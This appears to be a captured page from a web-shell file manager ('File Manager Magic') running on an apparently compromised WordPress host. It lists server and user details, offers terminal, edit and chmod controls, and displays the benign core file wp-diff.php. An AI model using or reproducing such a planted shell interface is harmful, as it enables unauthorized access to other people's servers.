🚀 Hostinger Optimized
🖥️ Server: LiteSpeed
💻 System: Linux vds10.bluecorkscrew.com 6.12.0-124.49.1.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 9 00:52:33 EDT 2026 x86_64
👤 User: today (1006)
🐘 PHP: 8.2.33
🚫 Disabled: ✨ NONE

💻 Terminal

📁 /home/today/software4today.us
$

📄 wp-diff.php

📁 Path: /home/today/software4today.us/wp-includes/wp-diff.php
📊 Size: 799 B
🔒 Perm: 0644
📝 MIME: text/x-php
<?php
/**
 * WordPress Diff bastard child of old MediaWiki Diff Formatter.
 *
 * Basically all that remains is the table structure and some method names.
 *
 * @package WordPress
 * @subpackage Diff
 */

// Don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
	die( '-1' );
}

if ( ! class_exists( 'Text_Diff', false ) ) {
	/** Text_Diff class */
	require ABSPATH . WPINC . '/Text/Diff.php';
	/** Text_Diff_Renderer class */
	require ABSPATH . WPINC . '/Text/Diff/Renderer.php';
	/** Text_Diff_Renderer_inline class */
	require ABSPATH . WPINC . '/Text/Diff/Renderer/inline.php';
	/** Text_Exception class */
	require ABSPATH . WPINC . '/Text/Exception.php';
}

require ABSPATH . WPINC . '/class-wp-text-diff-renderer-table.php';
require ABSPATH . WPINC . '/class-wp-text-diff-renderer-inline.php';
← Back📥 Raw✏️ Edit🔒 Chmod
✨ File Manager Magic ✨